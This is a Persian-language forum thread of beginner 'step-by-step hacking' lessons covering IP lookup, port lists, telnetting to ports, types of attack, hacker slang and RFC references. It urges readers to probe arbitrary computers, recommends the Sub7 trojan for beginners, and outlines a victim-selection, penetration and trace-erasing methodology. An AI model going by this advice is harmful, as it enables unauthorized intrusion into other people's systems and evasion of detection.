1. درس سوم: به‌دست آوردن IP خودتان بعد از اتصال به اينترنت



1- به روش های قبل IP خودتان را پیدا کنید.



Connection-specific DNSSuffix . : a




IPAddress. . . . . . . . . . . . : 217.66.198.116




SubnetMask . . . . . . . . . . . : 255.255.255.255


DefaultGateway . . . . . . . . . : 217.66.198.116




که آدرس ip تان را می‌توانيد در سطر IpAddress ببينيد. (مسئله ****** را فعلا ناديده بگيريد)


۲- بعد از اتصال به اينترنت حداقل يک صفحه باز کنيد و بعد دستور netstat -n را در command prompt تايپ کنيد. من با تايپ اين دستور به نتايج زير رسيدم:

ActiveConnections



Proto LocalAddress Foreign Address State


TCP 217.66.198.116:2469 64.58.76.177:80ESTABLISHED


TCP 217.66.198.116:2471 66.163.175.130:80 ESTABLISHED


TCP 217.66.198.116:2473 212.73.194.143:80 ESTABLISHED


TCP 217.66.198.116:2474 212.73.194.143:80 ESTABLISHED


TCP 217.66.198.116:2476 212.73.194.136:80SYN_SENT




ستونی که زير عبارت LocalAddress قرار دارد، ip من در آن اتصال است. بنابراين ip من در آن اتصال 217.66.198.116 بوده است.
1. درس چهارم: Port چيست؟


پورت به طور کلی به درگاه های ورودی و خروجی کامپوتر گفته می شود که حتما مثل پورت موس و کی بورد وجود خارجی ندارند بلکه درگاه های منطقی باشند که هر سيستم 65535 پورت تی سی پی و 65535 پورت يو دی پی دارد . ليستی از پورت های معروف و مورد استفاده:
7
tcpecho
11
tcpsystat
19
tcpchargen
21
tcpftp-data
22
tcpssh
23
tcptelnet
25
tcpsmtp
42
tcpnameserver
43
tcpwhois
49
udptacacs
53
udpdns-lookup
53
tcpdns-zone
66
tcporacle-sqlnet
69
udptftp
79
tcpfinger
80
tcphttp
81
tcpalternativeforhttp
88
tcpkerberosoralternativeforhttp
9
tcppop2
110
tcppop3
111
tcpsunrpc
118
tcpsqlserv
119
tcpnntp
135
-or-dec
139
tcpnetbios
143
tcpimap
161
udpsnmp
162
udpsnmp-trap
179
tcpbgp
256
tcpsnmp-checkpoint
389
tcpldap
396
tcpnetware-ip
407
tcptimbuktu
443
tcphttps/ssl
445
tcpms-smb-alternate
445
udpms-smb-alternate
500
udpipsec-internet-key-exchange(ike)a
513
tcprlogin
513
udprwho
514
tcprshell
514
udpsyslog
515
tcpprinter
515
udpprinter
520
udprouter
524
tcpnetware-ncp
799
tcpremotelypossible
1080
tcpsocks
1313
tcpbmc-patrol-db
1352
tcpnotes
1433
tcpms-sql
1494
tcpcitrix
1498
tcpsybase-sql-anywhere
1524
tcpingres-lock
1525
tcporacle-srv
1527
tcporacle-tli
1723
tcppptp
1745
tcpwinsock-proxy
2000
tcpremotely-anywhere
2001
tcpcisco-mgmt
2049
tcpnfs
2301
tcpcompaq-web
2447
tcpopenview
2998
tcprealsecure
3268
tcpms-active-dir-global-catalog
3268
udpms-active-dir-global-catalog
3300
tcpbmc-patrol-agent
3306
tcpmysql
3351
tcpssql
3389
tcpms-termserv
4001
tcpcisco-mgmt
4045
tcpnfs-lockd
5631
tcppcanywhere
5800
tcpvnc
6000
tcpxwindows
6001
tcpcisco-mgmt
6549
tcpapc
6667
tcpirc
8000
tcpweb
8001
tcpweb
8002
tcpweb
8080
tcpweb
9001
tcpcisco-xremote
12345
tcpnetbus
26000
tcpquake
31337
udpbackorifice
32771
tcprpc-solaris
32780
udpsnmp-solaris
43188
tcpreachout
65301
tcppcanywhere-def


از ميان پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.
1. درس پنجم: چگونه به يک پورت Telnet کنيم؟




برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در commandprompt دستور زير را تايپ کنيد


:telnet hostnameportnum


در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir (http://www.njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.iums.ac.ir%2F) مي‌نويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، (البته فقط برای آموزش نه خرابکاری)


تقسيم‌بندی انواع حملات
اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثلSub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد.
علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روشExploit
۳- حمله به روشInfo Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation
در مورد هرکدام به‌زودی توضيح می‌دم.
C,Linux,TCP/IP يادتون نره درترسيم مسير برای آينده:
1- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (
Victim) را Footprinting گويند.
اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد.
يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان
username و password مربوط به مدير کامپيوتر (administrator) يا supervisor یا ... را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود.
اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم
البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم


بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.


خلاصه مطالب بالا به اين صورت است:
Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning

uody
19th January 2011, 11:08 AM
خوب منم یه منبع دیگه دارم که دارای 19 قسمته از امروز سعی میکنم براتون روزی یه قسمت قرارمیدم

موضوع: مقدمات قبل از شروع یادگیری هک

قسمت 1
- ترمينولوژی (اصطلاح‌شناسی)

- Hacker کيست ؟
هکرکسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص(بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هرحال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتمادارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشفمی‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايیرا به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها راpatch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چندسال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حلمی‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
ازقديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوترنداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ...بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;


- زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند


- تقسيم‌بندی

- انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.


- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD, Linux, Sun Solaris )
* خانواده Windows (مثل WinNT, Win2000 )
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...


- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.


- برای شروع چه چيزی لازم است؟

۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی


- تقسيم‌بندی انواع حملات

اوليننکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌هایکلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که بهاينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدرمی‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشاللهميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation

در مورد هرکدام به‌زودی توضيح می‌دم.


- 133t Speak چيست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:
0 <= O
1 <= L; I
2 <= Z
3 <= E
4 <= A
5 <= S
6 <= G
7 <= T
8 <= B
| <= L; I
@ <= at (duh)
$ <= S
)( <= H
}{ <= H
/\/ <= N
\/\/ <= W
/\/\ <= M
|> <= P; D
|< <= K
ph <= f
z <= s


مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.


- ترسيم مسير برای آينده

۱-اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد (کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملامتفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری کهفلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوترفلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) وجمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی(Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ipاوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوعسيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد.يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آنکامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳-مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوحمختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی استکه بتوان username و password مربوط به مدير کامپيوتر (administrator) ياsuperuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذدست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... )نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌توانداستفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده ونيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن بهيک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند کهچه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتنرا داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردنردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گيربيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که درمورد آنها اين مرحله بسيار مهم است.

e.einitabar
19th January 2011, 01:04 PM
سلام uody ممنون واسه تکمیل کردن تاپیک
یا حق

uody
19th January 2011, 01:07 PM
اوهــــــــــــــــــــــ ــه خبر نداری میخوام 18 قسمت دیگه بزارم این تازه اولشــــــــــــــــــه
مثل شما همه رو یه روزه نمیذارم بذارین دوستان یه کم فقط یه کم انتظار بکشن[bamazegi]

e.einitabar
19th January 2011, 01:10 PM
من این کارو کردم تا یه دفعه بتونن اون رو توی یه صفحه ی word کپیش کنن
وای فک کنم شما درست میگید

uody
20th January 2011, 09:05 AM
بله دوستان من و این هم قسمت 2 وم ماجرا

آموزش قدم به قدم هک قسمت 2
موضوع:تعریف ip,port
- IP

شماره‌ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آنشماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالتسرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشیغير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برایديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته وبه اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxxکه منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفادهنيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت195.219.176.69 باشد. حتی اسم‌هايی مثل http://www.yahoo.com که برای اتصالاستفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو راببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيحمی‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد،معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهدبود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران)بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردنIP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سرینکات فنی داريم که بعدا می‌گم)


- Port

درساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هکمعمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبتمی‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کارخاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند.پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند.مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اينکار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند.اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزاراستفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:
Port Num Service Why it is phun!
-------- ------- ----------------------------------------
7 echo Host repearts what you type
9 discard Dev/null
11 systat Lots of info on users
13 daytime Time and date at computers location
15 netstat Tremendous info on networks
19 chargen Pours out a stream of ASCII characters.
21 ftp Transfers files
23 telnet Where you log in.
25 smpt Forge email
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used!
syslog Remote system logging
520 route Routing information protocol
از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.

uody
29th January 2011, 06:52 PM
سلام دوستان من سر قول خودم بودم اما من از کجا باید با خبر میشدم سایت یه مدت تعطیل میشه [khejalat]
به هر حال الآن دوباره سایت هست من هستم وشما هم حضور دارید [esteghbal]
میگم وقتی سایت تعطیل شد یه سری از ارسالی ها هم پاک شده خلاصه من از قسمت 2 به بعد برا شما دوستان(طبق قولم روزی یه قسمت آموزش)میذارم

آموزش قدم به قدم هک قسمت 3
وضوع:rfcچیست؟

- RFC چيست؟
متونبسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اينفايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعهو نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگزتغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)

- فايل‌های RFC از کجا قابل دسترسی هستند؟
RFCها از سايت‌های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است:
http://www.ietf.org/rfc/xxxxxxx.txt (http://www.njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.ietf.org%2Frfc %2Fxxxxxxx.txt)
که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم:
http://www.ietf.org/rfc/rfc791.txt (http://www.njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.ietf.org%2Frfc %2Frfc791.txt)

- ليست مشهورترين RFCها
+General Information
RFC1360 IAB Official Protocol Standards
RFC1340 Assigned Numbers
RFC1208 Glossary of Networking Terms
RFC1180 TCP/IP Tutorial
RFC1178 Choosing a Name for Your Computer
RFC1175 FYI on Where to Start:
A Bibliography of Inter-networking Information
RFC1173 Responsibilities of Host and Network Managers:
A Summary of the Oral Tradition of the Internet
RFC1166 Internet Numbers
RFC1127 Perspective on the Host Requirements RFCs
RFC1123 Requirements for Internet Hosts—Application and Support
RFC1122 Requirements for Internet Hosts—Communication Layers
RFC1118 Hitchhiker"s Guide to the Internet
RFC1011 Official Internet Protocol
RFC1009 Requirements for Internet Gateways
RFC980 Protocol Document Order Information
+TCP and UDP
RFC1072 TCP Extensions for Long-Delay Paths
RFC896 Congestion Control in IP/TCP Internetworks
RFC879 TCP Maximum Segment Size and Related Topics
RFC813 Window and Acknowledgment Strategy in TCP
RFC793 Transmission Control Protocol
RFC768 User Datagram Protocol
+IP and ICMP
RFC1219 On the Assignment of Subnet Numbers
RFC1112 Host Extensions for IP Multicasting
RFC1088 Standard for the Transmission of IP Datagrams over
NetBIOS Networks
RFC950 Internet Standard Subnetting Procedure
RFC932 Subnetwork Addressing Schema
RFC922 Broadcasting Internet Datagrams in the Presence of Subnets
RFC9l9 Broadcasting Internet Datagrams
RFC886 Proposed Standard for Message Header Munging
RFC815 IP Datagram Reassembly Algorithms
RFC814 Names, Addresses, Ports, and Routes
RFC792 Internet Control Message Protocol
RFC791 Internet Protocol
RFC781 Specification of the Internet Protocol (IP) Timestamp Option
+Lower Layers
RFC1236 IP to X.121 Address Mapping for DDN
RFC1220 Point-to-Point Protocol Extensions for Bridging
RFC1209 Transmission of IP Datagrams over the SMDS Service
RFC1201 Transmitting IP Traffic over ARCNET Networks
RFC1188 Proposed Standard for the Transmission of IP Datagrams
over FDDI Networks
RFC1172 Point-to-Point Protocol Initial Configuration Options
RFC1171 Point-to-Point Protocol for the Transmission of
Multiprotocol Datagrams over Point-to-Point Links
RFC1149 Standard for the Transmission of IP Datagrams on Avian
Carriers
RFC1055 Nonstandard for Transmission of IP Datagrams over
Serial Lines: SLIP
RFC1044 Internet Protocol on Network System"s HYPERchannel:
Protocol Specification
RFC1042 Standard for the Transmission of IP Datagrams over
IEEE 802 Networks
RFC1027 Using ARP to Implement Transparent Subnet Gateways
RFC903 Reverse Address Resolution Protocol
RFC895 Standard for the Transmission of IP Datagrams over
Experimental Ethernet Networks
RFC894 Standard for the Transmission of IP Datagrams over
Ethernet Networks
RFC893 Trailer Encapsulations
RFC877 Standard for the Transmission of IP Datagrams over
Public Data Networks
+Bootstrapping
RFC1084 BOOTP Vendor Information Extensions
RFC951 Bootstrap Protocol
RFC906 Bootstrap Loading Using TFTP
+Domain Name System
RFC1101 DNS Encoding of Network Names and Other Types
RFC1035 Domain Names—Implementation and Specification
RFC1034 Domain Names—Concepts and Facilities
RFC1033 Domain Administrators Operations Guide
RFC1032 Domain Administrators Guide
RFC974 Mail Routing and the Domain System
RFC920 Domain Requirements
RFC799 Internet Name Domains
+File Transfer and File Access
RFC1094 NFS: Network File System Protocol Specification
RFC1068 Background File Transfer Program (BFTP)
RFC959 File Transfer Protocol
RFC949 FTP Unique-Named Store Command
RFC783 TFTP Protocol (Revision 2)
RFC775 Directory Oriented FTP Commands
+Mail
RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for
Specifying and Describing the Format of Internet Message
Bodies
RFC1143 Q Method of Implementing Telnet Option Negotiation
RFC1090 SMTP on X.25
RFC1056 PCMAIL: A Distributed Mail System for Personal Computers
RFC974 Mail Routing and the Domain System
RFC822 Standard for the Format of ARPA Internet Text Messages
RFC821 Simple Mail Transfer Protocol
+Routing Protocols
RFC1267 A Border Gateway Protocol 3 (BGP-3)
RFC1247 OSPF version 2
RFC1222 Advancing the NSFNET Routing Architecture
RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments
RFC1164 Application of the Border Gateway Protocol in the Internet
RFC1163 Border Gateway Protocol (BGP)
RFC1136 Administrative Domains and Routing Domains:
A Model for Routing in the Internet
RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol
RFC1058 Routing Information Protocol
RFC911 EGP ateway under Berkeley UNIX 4.2
RFC904 Exterior Gateway Protocol Formal Specification
RFC888 STUB Exterior Gateway Protocol
RFC827 Exterior Gateway Protocol (EGP)
RFC823 DARPA Internet Gateway
+Routing Performance and Policy
RFC1254 Gateway Congestion Control Survey
RFC1246 Experience with the OSPF Protocol
RFC1245 OSPF Protocol Analysis
RFC1125 Policy Requirements for Inter-Administrative Domain Routing
RFC1124 Policy Issues in Interconnecting Networks
RFC1104 Models of Policy-Based Routing
RFC1102 Policy Routing in Internet Protocols
+Terminal Access
RFC1205 Telnet 5250 Interface
RFC1198 FYI on the X Window System
RFC1184 Telnet Linemode Option
RFC1091 Telnet Terminal-Type Option
RFC1080 Telnet Remote Flow Control Option
RFC1079 Telnet Terminal Speed Option
RFC1073 Telnet Window Size Option
RFC1053 Telnet X.3 PAD Option
RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation
RFC1041 Telnet 3270 Regime Option
RFC1013 X Window System Protocol, version 11: Alpha Update
RFC946 Telnet Terminal Location Number Option
RFC933 Output Marking Telnet Option
RFC885 Telnet End of Record Option
RFC861 Telnet Extended Options: List Option
RFC860 Telnet Timing Mark Option
RFC859 Telnet Status Option
RFC858 Telnet Suppress Go Ahead Option
RFC857 Telnet Echo Option
RFC856 Telnet Binary Transmission
RFC855 Telnet Option Specifications
RFC854 Telnet Protocol Specification
RFC779 Telnet Send-Location Option
RFC749 Telnet SUPDUP-Output Option
RFC736 Telnet SUPDUP Option
RFC732 Telnet Data Entry Terminal Option
RFC727 Telnet Logout Option
RFC726 Remote Controlled Transmission and Echoing Telnet Option
RFC698 Telnet Extended ASCII Option
+Other Applications
RFC1196 Finger User Information Protocol
RFC1179 Line Printer Daemon Protocol
RFC1129 Internet Time Synchronization: The Network Time Protocol
RFC1119 Network Time Protocol (version 2) Specification
and Implementation
RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2
RFC1014 XDR: External Data Representation Standard
RFC954 NICNAME/WHOIS
RFC868 Time Protocol
RFC867 Daytime Protocol
RFC866 Active Users
RFC865 Quote of the Day Protocol,
RFC864 Character Generator Protocol
RFC863 Discard Protocol
RFC862 Echo Protocol
Network Management
RFC1271 Remote Network Monitoring Management Information Base
RFC1253 OSPE version 2: Management Information Base
RFC1243 Appletalk Management Information Base
RFC1239 Reassignment of Experimental MIBs to Standard MIBs
RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO
8473) and End System to Intermediate System (ISO 9542)
RFC1233 Definitions of Managed Objects for the DS3 Interface Type
RFC1232 Definitions of Managed Objects for the DS1 Interface Type
RFC1231 IEEE 802.5 Token Ring MIB
RFC1230 IEEE 802.4 Token Bus MIB
RFC1229 Extensions to the Generic-Interface MIB
RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed
Program Interface
RFC1227 SNMP MUX protocol and MIB
RFC1224 Techniques for Managing Asynchronously Generated Alerts
RFC1215 Convention for Defining Traps for Use with the SNMP
RFC1214 OSI Internet Management: Management Information Base
RFC1213 Management Information Base for Network Management of
TCP/IP-based Internets: MiB-II
RFC1212 Concise MIB Definitions
RFC1187 Bulk Table Retrieval with the SNMP
RFC1157 Simple Network Management Protocol (SNMP)
RFC1156 Management Information Base for Network Management of
TCP/IP-based Internets
RFC1155 Structure and Identification of Management Information for
TCP/IP-Based Internets
RFC1147 FYI on a Network Management Tool Catalog: Tools for
Monitoring
and Debugging TCP/IP Internets and Interconnected Devices
RFC1089 SNMP over Ethernet
+Tunneling
RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1
RFC1234 Tunneling IPX Traffic through IP Networks
RFC1088 Standard for the Transmission of IP Datagrams over
NetBIOS Networks
RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP
Transport: Detailed Specifications
RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP
Transport: Concepts and Methods
+OSI
RFC1240 OSI Connectionless Transport Services on Top of UDP:
Version 1
RFC1237 Guidelines for OSI NSAP Allocation in the Internet
RFC1169 Explaining the Role of GOSIP
+Security
RFC1244 Site Security Handbook
RFC1115 Privacy Enhancement for Internet Electronic Mail:
Part III Algorithms, Modes, and Identifiers [Draft]
RFC1114 Privacy Enhancement for Internet Electronic Mail:
Part II Certificate-Based Key Management [Draft]
RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I—
Message Encipherment and Authentication Procedures [Draft]
RFC1108 Security Options for the Internet Protocol
+Miscellaneous
RFC1251 Who"s Who in the Internet: Biographies of
